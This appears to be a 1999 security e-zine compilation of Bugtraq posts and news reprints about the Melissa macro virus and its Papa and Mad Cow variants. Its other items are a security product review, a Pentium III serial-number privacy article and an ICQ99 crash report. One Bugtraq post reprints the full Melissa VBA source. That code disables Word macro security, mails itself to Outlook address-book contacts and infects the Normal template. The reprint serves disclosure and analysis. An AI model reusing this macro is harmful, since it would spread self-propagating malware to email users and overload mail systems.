is getting enough play to warrant a message.

There is a new Word macro virus circulating called Melissa. The virus
propagates via email. Attached to the email is a Word file that when
opened will launch a macro that will send the same message to the first
50 recipients of your Outlook address book. The subject line is
"important Message From <some user name>". The body consist of the text
"Here is that document you asked for... don't show anyone else;-)".
The infected documents contains passwords to porn web sites.

For more information check out: http://vil.mcafee.com/vil/vm10120.asp

As this thing is emailing itself to everyone under the sun virus vendors
should have no problem obtaining copies to analyze. If anyone wants a copy
send me a message.


--
Aleph One / aleph1@underground.org
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01

----------------------------------------------------------------------------

Date: Fri, 26 Mar 1999 18:01:13 -0800
From: Nate Lawson <nate@ROOT.ORG>
To: BUGTRAQ@netspace.org
Subject: Melissa virus code

Sorry to add one more message to this. I placed the code up on my site,
formatted so that it is readable.

http://www.root.org/

-Nate

[http://www.root.org/melissa_virus.txt]


from: http://www.root.org/melissa_virus.txt


Private Sub Document_Open()
On Error Resume Next
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If

Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo" Then
If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakUmOffASlice.Subject = "Important Message From " & Application.UserName
BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)"
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = ""
Next y
DasMapiName.Logoff
End If
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo"
End If


Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa"
DoAD = True
End If

If NTI1.Name <> "Melissa" Then
If NTCL > 0 Then NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = "Melissa"
DoNT = True
End If

If DoNT <> True And DoAD <> True Then GoTo CYA

If DoNT = True Then
Do While ADI1.CodeModule.Lines(1, 1) = ""
ADI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If

If DoAD = True Then
Do While NTI1.CodeModule.Lines(1, 1) = ""
NTI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If

CYA:

If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True
End If

'WORD/Melissa written by Kwyjibo
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!

If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here."
End Sub


12.2 PAPA, a new Melissa variant targets specific individual sites with ping flood attacks
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

New Virus Launches Mini Infowar
http://www.internetnews.com/bus-news/article/0,1087,3_89541,00.html
March 30, 1999
By Brian McWilliams
InternetNews.com Correspondent
Business News Archives


A new macro virus based on the infamous Melissa has been released into the wild, and it may be the latest phase in an infowar
between hackers and a security consultant.

According to virus experts, the so-called Papa virus is transmitted in the same manner as Melissa, sending copies of itself to
addresses in a victim's Microsoft Outlook address book.

But while Melissa seemed designed to snarl up computer networks everywhere, Papa targets a specific person, Fred Cohen, a
security consultant in Livermore, Calif.

The virus, which is transmitted by e-mail in a Microsoft Excel file named path.xls, attempts to launch a ping flood on Cohen's web
site at all.net, as well as on the IP address of Cohen's connection to the @Home Network cable Internet access service.

Cohen was among the first in the security community to publicize information about Caligula, a macro virus capable of stealing a
victim's PGP private keyring. PGP is a popular encryption software package.

In a posting to a security mailing list last month, Cohen called on the Internet community to attack the web site of the Codebreakers,
a virus writer's group to which Caligula's author belongs.

Cohen Tuesday confirmed the Papa virus is some sort of retaliation for his actions. But Cohen said there's been collateral damage to
innocent Internet users, including severe performance degradation to the @Home Network.

"It's not an eye for an eye. They're causing damage to the infrastructure and inconvenience to people who get the virus. If they
pester me, I don't care and nobody else cares. But if they take down the infrastructure, they'll go to jail."

@Home Network representatives were not available to confirm whether the attack on Cohen's IP address has impacted
performance of the network.

Many antivirus software vendors have already released updates to detect and clean Papa. Keith Peer, president of Central
Command, distributor of AntiViral ToolKit Pro said Papa is already spreading fast. His firm is receiving dozens of reports every
hour.

@HWA


12.2 PAPA B and MadCow Joke virii variants already becoming widespread
as copycats modify the Melissa code
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Yet another variant of the nasty Melissa virus has surfaced on the Internet,
this one with the subject line "Mad cow joke."

<a href="Story</a">http://www.zdnet.com/zdnn/special/melissavirus.html">Story</a>


The new mad cow joke virus is unrelated to other so-called Mad Cow viruses
that have surfaced in the past, according to anti-virus company Trend Micro
Inc. The new virus is similar to Melissa in that it surfaces when users open
a Word document attached to an e-mail, triggering e-mail to the top entries in
an Outlook user's address book.

Unlike Melissa, which sends out 50 messages, this one sends out only 20. Also,
it is a member of a group of viruses known as "class viruses," which store code
in a different -- and harder-to-detect -- portion of a Word document.

'I think it's going to show up affecting people,'
-- Dan Schrader, Trend Micro


The virus comes with a subject line "Mad cow joke," a body containing the words
"beware of the speed of the Mad cow," and an attached file called madcow.doc.

The virus' creator even tipped his or her hat to Melissa. The last lines of
code in the Mad cow virus read: "word/veronicathankstoword/melissaandword/class."


Trend Micro hasn't heard from anybody who's seen the virus in action, but
officials there believe they will shortly. "I think it's going to show up affecting
people," said Dan Schrader, Trend Micro's product manager.


More variations coming

Schrader believes a host of variant viruses will surface in the wake of Melissa.
"We're going to see a lot of them," Schrader said. "It's unfortunate these guys
need to copycat."

Most anti-virus firms have updated their software to ward off variants.

"When viruses become popular, other hackers use them as a roadmap," said, Sal
Viveros, group marketing manager for Network Associate Inc.'s
(Nasdaq:<A HREF="NETA</A">http://www.zdii.com/industry_list_new.asp?mode=news&ticker=neta">NETA</A>) anti-virus products.<p>


Because those roadmaps in the variants are similar to the original virus, most
anti-virus software can detect and exterminate them.


Only a few get through

Most viruses created never reach actual users. Of the 35,000 to 40,000 viruses
created by both researchers and malicious hackers, only 200 to 300 ever pass
through innocent users' computers, according to Symantec Corp. (Nasdaq:
<A HREF="SYMC</A">http://www.zdii.com/industry_list_new.asp?mode=news&ticker=symc">SYMC</A>), another anti-virus firm.<p>

"The vast majority of viruses are not ever deployed or released," said Carey
Nachenberg, chief researcher at Symantec's anti-virus research center.

Although the source code for many viruses is easy to get, making copying them
relatively simple, the ramifications of sending out a virus as destructive as
Melissa discourages many hackers from doing so.

The FBI has launched a widespread search for Melissa's creator, whom officials
said could face as many as 10 years in jail and $350,000 in fines.

Meanwhile, anti-virus researchers also are learning new details of the so-called
Papa virus, a Melissa variant that is carried by Excel documents and sends out
60 e-mails when opened.


Virus warrior a target

The virus contains the subject line "Fwd: Workbook from all.net and Fred Cohen"
and a body reading "Urgent info inside. Disregard macro warning."

The Papa virus first surfaced Monday, but after studying it, researchers found a
glitch that kept it from working, rendering it "sterile."

But Tuesday, someone apparently had fixed that glitch, and the newer, virulent
strain of virus -- "Papa B" -- was reportedly on the loose.

Anti-virus software maker Network Associates said it's had reports of Papa B
hitting at least one Fortune 100 company and two large firms in Europe.

When opened, the virus also pings -- or, repeatedly hits -- two Web sites, one run
by anti-virus expert Fred Cohen, the subject of the virus message, and @Home.

Cohen suspects a group of hackers created the virus to target him because he fingered
them in another virus, which was called Caligula. "They have made threats over the
last several weeks," Cohen said.


Just say 'no'

To protect himself from such attacks, Cohen said he simply says "no" to any attachment
that comes his way.

Still, he believes that Microsoft Corp. cuts too many security corners in Windows,
oversights that could lead to more breaches. The Melissa virus and its variants have
been carried through Microsoft documents.

"We are building a house of cards and it is going to be blown down every so often,"
he said.

ZDNN's Rob Lemos contributed to this story

@HWA


12.3 Is Microsoft to blame for the Melissa virus and variants?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.latimes.com/HOME/BUSINESS/t000028532.1.html
<a href="http://www.latimes.com/HOME/BUSINESS/t000028532.1.html>direct link</a>

Security of Microsoft's Products Is Questioned
Technology: Melissa virus is latest attack on firm's software and raises
concerns about its ability to protect customers.
By LESLIE HELM, Times Staff Writer


SEATTLE--The Melissa virus that has been tying up computer systems around
the world is just the latest in a string of attacks on Microsoft software
and has raised questions among security experts about Microsoft's ability
to protect its customers. The security holes in Microsoft's Windows NT,
Office and e-mail software are especially troublesome given those products'
rapid spread throughout the corporate world, in many cases pushing aside
more mature and secure but expensive systems based on Unix.

Microsoft is a popular target for such attacks because the company is
disdained by many hackers and its products are widely used, but experts
say the company has also made its software vulnerable by introducing new
functions before they are properly debugged and not educating consumers
about the potential hazards. Melissa should be particularly worrisome to
computer users and corporate administrators, experts said, because it
represents a new trend in penetrating corporate systems. It attacks the
more vulnerable individual users' desktops rather than taking the more
traditional approach of breaking into central computers that control the
networks. "People are getting at a corporation's information through the
client [desktop]," said a hacker who identified himself as Weld Pond.
"Windows 95 doesn't even have a security model." Pond, a member of L0pht,
a group that has had great success cracking Microsoft software, said
Microsoft's approach to creating mini-programs called macros is an example
of the kind of code that has not been well thought out.

A macro is essentially code that puts the computer through a series of
routines--forwarding an expense report through the proper channels, for
example. The Melissa virus uses that capability to order a computer to send
a list of pornographic Web sites to those listed in a computer's e-mail
address book.

Pond said the problem with Microsoft's approach to security is that
users who receive an e-mail containing a macro are only given the choice
of activating the macro or not activating it. "You can't tell the system
to open the program but don't give it access to my system," Pond said.
By contrast, Pond pointed out that in designing the Java language,
Sun Microsystems used a "sandbox" approach that largely prevents a Java
program downloaded from the Net from interfering with the rest of the
computer's operations. That has all but shut hackers out of using Java
to infect computers.

Joe Wells of Thousand Oaks maintains Wild List, a catalog of active
viruses. Wells said that close to half of all new viruses are hidden inside
macros. "It is by far the fastest-growing group," he said. Microsoft said
it will continue to use macros because they are popular among corporate
users. "Our customers have told us that the macro language is important to
them," said George Meng, group product manager for Microsoft Office.

Meng said consumers can avoid problems by clicking "disable" when
presented with an unfamiliar macro. Meng said future versions of its
Office suite of programs would be designed so network administrators
could screen out macros that don't come from specified sources.

But not all Windows security attacks rely on macros. A hacker group
known as Cult of the Dead Cow released a program last summer called "Back
Orifice" that can be sent to a desktop computer over the Internet, then
used by a hacker to remotely control that computer. In its effort to
promote the use of macros, experts say, Microsoft hasn't done a sufficient
job of warning consumers of security dangers. Since most consumers never
use macros, for example, Microsoft could easily ship Office with the default
setting on "off" for macros, but it doesn't.

"If Microsoft shipped its products with the macros off, we'd probably
all be fine," said Alan Paller, director of research at SANS Institute, a
Bethesda, Md.-based nonprofit group that provides security training. Microsoft
"wants the product to be as powerful as possible," Paller said. "But sometimes
fixing it [for security reasons] hobbles it a little bit." "I don't know what
Microsoft could do other than say "no" to macros, and that is a big issue in
marketing Word," said Matt Bishop, an associate professor of computer science
at UC Davis.

Yaro Charnot, chairman of Institute of Reverse Engineering, a Pasadena-
based security consulting company, said there is a broader problem regarding
Microsoft's attitude toward security. Its e-mail program Outlook, for example,
which was used by Melissa to spread the virus, contains lots of bugs that bring
down the system frequently, making it particularly susceptible to viruses, Charnot
said.

"Every time the computer crashes, that is an opportunity for a hacker
to take over the computer," he said.

Charnot said Microsoft's system for reporting bugs is unfriendly to users,
and the firm seldom acknowledges such reports. Frequently the bug is never fixed,
Charnot said. "It seems as if it is Microsoft policy not to care about security."
Security experts and hackers have repeatedly come up with serious security
holes in Microsoft's Windows NT software. One glitch, for example, allows a hacker
to get into a corporation's computer network, take on the role of network
administrator and get access to users' passwords and files.

Experts say Microsoft's next version of NT could include even more serious
problems because it includes many new lines of code. "It's a no-win situation from
a security perspective," Pond said.

Although Windows' competitors such as the Linux operating system also have
security problems, experts say those problems are easier to find because Linux's
underlying code is open for anybody to look at, unlike Microsoft Windows, which
is proprietary.

Copyright 1999 Los Angeles Times. All Rights Reserved

@HWA


12.4 Melissa makes it aboard ship and stows away
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


From Federal Computer Week:

http://www.fcw.com:80/pubs/fcw/1999/0329/web-ship-3-30-99.html

<a href="Link</a">http://www.fcw.com:80/pubs/fcw/1999/0329/web-ship-3-30-99.html">Link</a>

MARCH 30, 1999 . . . 10:40 EST


Melissa virus stows away aboard Navy ship

BY BOB BREWIN (antenna@fcw.com)

ABOARD THE USS BLUE RIDGE -- The wildly proliferating computer
virus "Melissa," which has infected e-mail servers across government and the
private sector, has made its way to e-mail accounts on this command ship of
the U.S. 7th Fleet, operating 20 miles of the coast of Guam in the western
Pacific Ocean.

The Melissa macrovirus, which began hitting systems last week, comes in the
form of an e-mail attachment. While the virus does no harm to an
organization's data or software, it can slow down and eventually crash the
e-mail server. The virus propagates itself by using a PC user's e-mail address
book to forward itself to other users.

But, thanks to a timely alert from the Navy's Fleet Information Warfare
Center (FIWC), the Blue Ridge managed to stop Melissa before its spread,
according to Cmdr. Michael Felmly, assistant chief of staff for command,
control, communications, computers and intelligence for the 7th Fleet.

"We got a heads up on what to do and what not do to do" last weekend from
FIWC via the Navy's Pacific Region Network Operations center in Hawaii,
Felmly said. The center supports the Blue Ridge and the eight 7th Fleet ships
participating in the semiannual Tandem Thrust exercise.

The information technology staff identified three e-mails that had the virus and
isolated them before they spread throughout the ship's unclassified local-area
network, which hosts 1,600 e-mail accounts, said Dennis Kaida, a network
and systems engineer from the Navy's Space and Naval Warfare Systems
Command and who is temporarily assigned to the Blue Ridge for Tandem
Thrust.

Kaida said that by the time the 7th Fleet network staff had isolated the e-mails
containing the virus, the network crew had gone to the Symantec Corp. home
page and downloaded Norton AntiVirus software that works against the
Melissa virus.

Vice Adm. Walter Doran, commander of the 7th Fleet, said that the ability of
the Melissa virus to make its way to this ship -- the showcase of the
networked Navy with a high-speed fiber-optic backbone and multiple satellite
links to the outside world -- highlighted the downside of such connectivity.

In the not-so-distant past, Doran said, "when you went to sea, you took off
the lines" and lost most connections to the world "except for a squawky
radio." But, thanks to the high speed network and satellite connections, Doran
said, "we are very much connected even at sea." In fact, shortly after
concluding the Melissa battle, the ship's staff had to gear up to fight off the
similar "Papa" virus, which attacks Microsoft Corp. Excel spreadsheets.

MARCH 30, 1999 . . . 13:50 EST


12.4a Melissa takes down Marine Corps e-mail
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

BY DANIEL VERTON (dan_verton@fcw.com)
http://www.fcw.com:80/pubs/fcw/1999/0329/web-usmc-3-30-99.html
<a href="link</a">http://www.fcw.com:80/pubs/fcw/1999/0329/web-usmc-3-30-99.html">link</a>

The fast-spreading e-mail virus "Melissa" has forced the Marine Corps to
shut down its base-to-base e-mail communications at least until tomorrow, a
spokeswoman for the Marines confirmed today.

According to the spokeswoman, the Marines are able to communicate
internally within each base, but all base-to-base e-mail connectivity has been
shut down until network administrators feel comfortable that they have taken
the appropriate security measures to protect against the virus. Other Internet
connections between bases has not been affected.

A spokeswoman for the Defense Department's Joint Task Force for
Computer Network Defense said the Army and the Air Force took their
servicewide servers down over the weekend to purge them of any messages
that might contain the Melissa macrovirus.

Melissa began infecting systems across the country late last week and comes
in the form of an e-mail attachment. While the virus does no harm to an
organization's data or software, it can slow down and eventually crash the
e-mail server. The virus propagates itself by using a PC user's e-mail address
book to forward itself to other users.


@HWA


12.5 Melissa virus creator apprehended
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNS <a href="net-security.org</a">http://www.net-security.org/">net-security.org</a>

MELISSA CREATOR APPREHENDED
by BHZ, Friday 2nd Apr 1999 on 7.29 pm CET
Melissa, famed Macro virus, that infected 100,000 computers in 3 days is still very
active in cyberspace. Many mutated viruses are created, and not just for MS Word,
but for MS Excel (x97/Papa.b - created as a personal vendetta to Fred Cohen, who
fingered one group for creating famous Caligula virus that steals PGP keys).
According to today's post to alt.comp.virus, Melissa's creator was caught. David L.
Smith, 30, of Aberdeen, was arrested Thursday night at his brother's house in nearby
Eatontown, said Rita Malley, a spokeswoman for Attorney General Peter Verniero.


13.0 [ISN] A hacker's worst nightmare
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From the ISN mailing list...


http://www.zdnet.com/pccomp/stories/all/0,6605,392297,00.html


PRODUCT REVIEWS
A Hacker's Worst Nightmare
Christopher Null
March 10, 1999


Stop Internet intruders in their tracks


You don't really want to share your customers' credit card numbers with
every hacker on the Internet, do you? If your network is connected to the
Internet and protected only by a firewall, you might be leaving your
business--and your customers' accounts--wide open to data pirates. A
firewall is good first line of defense, but it's probably not enough to
keep out persistent intruders. We tested three new antihacker tools and
found a wide range of useful and not-so-useful utilities that help you
plug the holes on your network.


Internet Security Systems Internet Scanner 5.6 is an exhaustive utility
that simulates more than 450 types of network attacks, then presents
comprehensive reports about the state of your network. Internet Scanner
is a mainstay with security experts, but it's also deceptively simple to
master.


Internet Scanner predefines several attack simulation packages--typically
called scans--ranging from simple scans to special scans for testing
router security. The simulated attacks are varied, including Windows NT-
specific attacks, mail server vulnerability checks, and denial-of-service
attacks (such as the Ping of Death). With all these tests, you'd think
Internet Scanner would have to run overnight to get results. Not so. A
complete scan with all tests on two systems took only 11 minutes to run.


Internet Scanner's new SmartScan feature keeps track of the results each
time you run it and uses that information to intelligently poke holes in
your network, much like a hacker who keeps track of previous successes and
failures. Altogether, it's the brainiest way to examine your network
security.


Heal Thyself Netect's HackerShield 1.1 is a relative newcomer to the
security scene, and it's still growing up. HackerShield strives to be a
comprehensive network analysis tool, but it falls far short in scope and
power. The product contains roughly 250 checks, substantially fewer than
the competition. And every time we tried running a full-network scan, it
froze in midtest because of its own denial-of-service attacks. We never
did get complete results, but with 120 checks activated, it took a long 25
minutes to scan two systems.


HackerShield does have its pluses. Its RapidFire updates are periodically
available on Netect's Web site, and downloading them expands the number of
attacks HackerShield simulates (about 50 are available each month).
HackerShield also automatically fixes some problems, whereas with Internet
Scanner you have to patch all the holes yourself. For example, both tools
will find that your server allows an administrator password, but only
HackerShield will fix it for you. Unfortunately, the autofix option worked
on only 15 percent of the problems we unearthed in our tests.


Rich Man's Expert Say you've patched all the holes you can, but you still
want to estimate the damage should a hacker make it through and abscond
with valuable trade secrets. L3 Network Security provides the solution in
Expert 3.0, a sophisticated network mapping and risk analysis system.


Unlike the other two products, Expert 3.0 doesn't actually test the
security on your network. Instead, you build a network map yourself
(Expert automates much of this process) and define the threats from
outside--and inside--the organization. Expert then provides detailed,
customized reports about threat and risk levels.


Expert works hand-in-hand with your antihacker software and firewall to
help you plan for the worst contingency, but its $9,500 price is steep.
Even though this includes two days of offsite training, you'll likely find
you have more affordable ways to map your network (with Visio) and crunch
numbers (with Excel).


Internet Scanner 5.6


Rating: Four Stars
Verdict: The most comprehensive security package on the market.
Pros: Exhaustive feature set; fast.
Cons: Pricey; cryptic descriptions.
Starting at $2,795 est. street price / Internet Security
Systems / (678) 443-6000


Expert 3.0


Rating: Three Stars
Verdict: A fancy way to map your network and analyze its risks.
Pros: Makes risk analysis simple.
Cons: Expensive for the features.
$9,500 est. street price / L3 Network Security / (888) 280-7475


HackerShield 1.1


Rating: Two Stars
Verdict: The antihacker tool with lots of hand-holding.
Pros: Automatically fixes some holes.
Cons: Slow; not comprehensive.
$695 per server est. street price / Netect /(888)
263-8328


-o-
Subscribe: mail majordomo@repsec.com with "subscribe isn".
Today's ISN Sponsor: Hacker News Network [www.hackernews.com]

@HWA

13.1 How bad is Pentium III privacy threat?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From C|Net news

Pentium III: How bad is privacy threat?
By Stephanie Miles
Staff Writer, CNET News.com
NEWS.COM
March 26, 1999, 11:45 a.m. PT
URL: http://www.news.com/SpecialFeatures/0,5,34300,00.html

news analysis Do the serial numbers on Intel's computer chips really present a major threat to consumer privacy?

Technology experts say recent reports of software programs capable of "grabbing" PC users' Pentium III serial numbers without their knowledge or consent
shouldn't alarm PC users. On the other hand, those on all sides of the debate agree that no one should be overly confident about the level of security these
microprocessors can ensure.

Nathan Brookwood, an analyst at Insight 64, reflects that conflict. "I'm not a good person at anticipating all the evil things people can do. But in my view, the whole
role of the PSN [processor serial number] has been somewhat overstated," he said.

Yet he was quick to add: "When you have a transaction and a user at one end of the network and a machine where the transaction is being handled at the other end,
and a big network in between, there are lots of ways to compromise a machine or break into a site."

Even privacy advocates concede that it is technically difficult for a hacker to do much harm if armed only with a purloined processor serial number. But these groups
are concerned that future technologies and uses of the Internet could allow grave abuse of this information in ways not envisioned today.

Regardless of the actual risk, the debate has become something of a battle royal between privacy advocates and corporate interests. The emotions arising from the
issue seem to transcend the mundane machinations of digital technology, introducing Orwellian rhetoric often reserved for such constitutional powder kegs as gun
control.

"Individuals should be able to control their identity and other forms of authentication," said Ari Schwartz, senior policy analyst for the Center for Democracy and
Technology, which has filed a complaint with the Federal Trade Commission, requesting that Intel be precluded from manufacturing the Pentium III with the serial
code.

Intel's recently released Pentium III processor contains a 96-bit serial number hardwired into the chip. The number was designed to add another layer of protection
for e-commerce transactions and to aid organizations in tracking assets.

Independent chip analysts say the framework in which the serial number will be exchanged makes it difficult for any third party to use a nabbed number nefariously.
These experts acknowledge that hackers or marketers will be able to steal it--but a number is likely all they will get, they say, not the key to your life.

"All they have at that point is a serial number, and that doesn't really help a lot," said Peter Glaskowsky, an analyst at MicroDesign Resources. To take advantage of
someone, he added, "you need a combination of an unethical Web site developer and a stupid Web site developer."

At the same time, Glaskowsky said, the serial number offers little in the way of added security. And companies looking for better ways to manage technology across
large networks are not sold on the Pentium III either.

"Asset management now is not done easily--it's either done physically or through personnel," said Pete Jackson, president of Intraware, a systems integration firm.
"It's a major problem throughout the enterprise, but I don't think a lot of people are going to switch to the Pentium III to solve the problem."

Security concerns have dogged the high-tech industry relentlessly, particular with the wild proliferation of Internet use. On the software side, Microsoft has faced its
own share of privacy issues, acknowledging earlier this month that Windows 98 collects information on users PCs through the Windows 98 registration process and
that documents created with Office 97 applications include information related to document authors. Microsoft halted the practice and issued patches for the security
holes.

Against this backdrop, it comes as not surprise that the Pentium III serial number has enjoyed a short but tortured life. Intel revealed the serial number system in
February, stating that the number was a third form of identification.

In Intel's view, those who want to gain access to number-protected sites will provide their user names and passwords, as well as let distant Web servers send down
an applet to confirm the processor serial numbers, said Pat Gelsinger, corporate vice president at Intel.

Although the serial number never changes, the confirming applet "hashes" it so that sites only get a placebo of the real number--and no two Web sites get the same
placebo.

In other words, if your processor serial number is X, one Web site will know you as Y, while another might know you as Z. Another layer of encryption disguises Y
or Z for the confirming transaction. During the exchange, processor numbers are further disguised to minimize the possibility that the true serial number will be
intercepted.

Therein lies the problem to privacy advocates, who note that this encryption technology is an option for Web sites but that there is no guarantee that all of them will
use it. "We're not confident about [widespread encryption], no," Schwartz said, understatedly.

Turning it back "on"
The plan was to have computer makers leave the serial number "on," or accessible and open to confirming software agents. After privacy groups protested, Intel
changed the software utility so that the PSN would be disabled by default shortly after a PC boots up.

Even before the chip was available in computers, a German technology magazine claimed that it had developed a method of circumventing the Intel-developed
software utility. A Canadian software firm Zero-Knowledge Systems then followed with an ActiveX control which grabs the serial number before the software utility
is activated, and after tricking a user into restarting their system.

But while these groups may have succeeded if their intent was embarrassing the world's largest chipmaker, analysts say that a stolen serial code does not present
much of an actual threat to a typical Pentium III user.

Even if the disabling utility is cracked, it would still be extremely difficult to do anything with the serial number, analysts maintain. For instance, if a hacker wanted to
get into private accounts, they would likely need more information, they say.

Most Web sites, especially e-commerce sites, which use the Processor Serial Number, require other forms of identity verification, not only to reassure visitors, but
also to protect their own interests, Glaskowsky said.

"Any Web site that is intelligent is going to ask you for some kind of password," he said. "It's inevitable that responsible online businesses will have a two-stage
verification process. One of those might be the serial number."

Many hacks required
Pulling this off is no small feat either, technologically speaking. A hacker couldn't just issue the PSN to a distant server. The hashed number through which the distant
server knows the user would have to be determined, which involves breaking into the distant server's database as well.

Then, even if that number could be determined, the additional layer of encryption would have to be hacked so that the hacker can send a confirming transactional
number that the distant server will accept.

"It's extremely difficult to [use the serial number] to impersonate another person--not impossible, but difficult," Glaskowsky explained. "It's far more straightforward
for a Web site operator to steal your serial number than for a hacker to trick them."

The pervasiveness of the encryption layer dents the other theory of danger: unscrupulous sharing. Although there may be a financial incentive for Web sites to sell or
share this number with other sites, there is no way to connect the encrypted number to an individual user, according to George Alfs, an Intel spokesman.

"It can't be compared to other Web site serial numbers," he said. "If sites are using the tamper-resistant tools, the numbers won't match."

Assurances fall on deaf ears
Many users, though realistic about the risks of using the Internet, are not assuaged by analyst and Intel reassurances. Web sites "knowing who you are...is pretty
much available through many sources, so don't sweat the small stuff," wrote reader Randy Dickson, who raised concerns about serial number thieves impersonating
PC users in chat rooms and newsgroups.

"While I think Intel had their heart in the right place, they seriously misunderstood how this information could be misused...Some of us don't mind the fact that Big
Brother may be watching, as long as he can't be misled," Dickson wrote.

Others, like Norman Thorsen, are more concerned about Web sites gathering yet more personal information about visitors, regardless of whether these sites then sell
or share the data. "Given this opportunity, marketers and, quite possibly government agencies, will collect as much information as possible," Thorsen wrote. "No one
asked the customer about collecting this information--Intel decided to provide it without prior notification. By definition, that is an invasion of privacy."

Dickson and other readers are concerned about Web sites that will only allow surfers to visit if the personal serial number is enabled.

"Web sites will develop content that requires the PSN, so that personal privacy must be compromised in order to use the Internet," one reader wrote. "Intel's
technology is fundamentally un-American. It is equivalent to installing video cameras on every street corner."

Many companies include serial numbers with their products, including software and hard drive manufacturers but do not share or sell that type of customer
information. This is not necessarily out of any noble respect for the privacy of its customers, but because it would be against their own strategic interests, said Greg
Blatnik, vice president of Zona Research.

"That type of information tends to have more value to the company that provided the product," Blatnik said, adding that many companies use customer lists
generated with the help of serial numbers to sell more products. "Companies guard that information fiercely."

Privacy advocates concede many of these points. What has them mostly worried is the future.

Future shock?
"What's the damage that could be done from a hacker grabbing your PSN? Not much right now," said Jason Catlett, president of Junkbusters, an advocacy group
supporting a boycott of Intel until the company removes the serial number, in an email interview. "But if Intel's plans of turning the PSN into an e-commerce identifier
pan out in the next few years, it will be used for theft of identity."

Catlett predicts it will be several years before the total privacy implications of the serial code are known. And by that time, he fears, such serial codes will likely have
become a de facto standard in identity authentication.

"Every time you move forward with technology, this happens," Brookwood said. "Before they created credit cards, there was no credit card fraud."


@HWA


14.0 ICQ99 Bug, erh feature turns your icq into a DoSable web server..
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Date: Mon, 29 Mar 1999 01:07:18 -0500
From: Ronald A. Jarrell <jarrell@VTSERF.CC.VT.EDU>
To: BUGTRAQ@netspace.org
Subject: icq DOS / possible "stupid user" vulnerability.

Ok, I was a bit surprised when, in playing with the new ICQ99a build 1700 v2.13
client (which I believe is the first publicly distributed one of the
99 family), I turned on the "Activate my home page" feature, and turned
my laptop into a web server...

Complete with a file server that allows by default anything in the
"program files\icq\homepage\root\YOUR#\files" folder to be requested.
Even set up a guest book, chat service, etc...

After getting over being astonished (yea, they said "turning this on

       might increase people's access to your machine, and tell them your 
ip address - of course it will. You're setting up a bloody web server
you idiots. A bad one at that.) I naturally started doing some poking.

Telnet to your port 80, and enter some non http gibberish. I tried
"quit<cr>" for grins. Blam. Down goes the ICQ client with a GPF.
Got someone else to turn theirs on, and sure enough, managed to shoot
him down too.

I warned Mirabilis about it. Folks at institutions that worry about
such things, but let their employees run ICQ might want to be aware
that said employees might well be running web servers now and not
evening know it. On you ICQ contact list, if they're on it, said
users show up with a little house next to their name.

--
Ron Jarrell
VA Tech Computing Center

@HWA


